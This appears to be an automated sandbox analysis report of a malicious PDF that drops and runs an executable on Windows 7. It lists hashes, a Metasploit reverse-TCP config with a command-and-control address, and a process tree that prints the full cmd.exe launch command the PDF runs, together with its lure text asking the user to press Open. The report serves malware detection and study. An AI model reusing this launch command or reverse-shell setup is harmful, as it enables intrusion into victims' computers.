Analysis

  • max time kernel
    139s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
  • submitted
    23/03/2025, 13:41

General

  • Target

    evil.pdf

  • Size

    263KB

  • MD5

    0370184d49423725fd4d9cf292ab50f0

  • SHA1

    f366cd94dd484ee0653bbb3b0a4f94e7e91a9290

  • SHA256

    cb666fb9180497844f015f390fa97f7fe82f6b7541d6ceca73f2ac52d5a5cab4

  • SHA512

    c052ec86d444f4c60fc65166c633e56f743c56930050447346e417d96593117f32af6f47b86eb02757704b22142a0701e46345348ee227d72fc03ffbc7af72f1

  • SSDEEP

    6144:QIbKOitp0dM3s0FLeNUOL8022Yl1gc2NeXabbuwzV/E/5:rbup3FU7LHClK60x/E/5

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

10.0.2.15:4444

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\evil.pdf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\1.pdf" (cd "Desktop"))&(if exist "My Documents\1.pdf" (cd "My Documents"))&(if exist "Documents\1.pdf" (cd "Documents"))&(if exist "Escritorio\1.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\1.pdf" (cd "Mis Documentos"))&(start 1.pdf) To view the encrypted content please check the "Do not show this message again" box and press Open.
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2880
      • \??\c:\Users\Admin\Documents\1.pdf
        1.pdf
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2056

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

    Filesize

    3KB

    MD5

    efd80beea17d88be652bcc32bf947fca

    SHA1

    4bbf8dccf99f96feacf312bdd89e8c05127755e0

    SHA256

    b50d8b53a2655b63d70a760fdde1a8dbbb45591b6f43fd8d46fcc802433feb98

    SHA512

    86a7e7359547ad5573263f2b35af55f586a0afa337fd3c47328d364ebf7cb3c859ac1c312e48850a104e13bcac26dd9519274eb4fc29a7112438febbdcea2c49

  • \Users\Admin\Documents\1.pdf

    Filesize

    72KB

    MD5

    6731e6f87d1dffccf16da9a628ef45ae

    SHA1

    0af5c12eca46d1c946399e1f41f0c30799a95773

    SHA256

    e7df01514e21ceb018b4d225caca32d3058366278c78134e8d6beb5c2a53509e

    SHA512

    3269a44610cadcae527d18cbdcc12492e91f46c24dcc30bed489ec60fb34b3eb3e71eaad90f2ee7df7aaf97db2c3ecd24c10b34fa191d66eb202b0c76394daad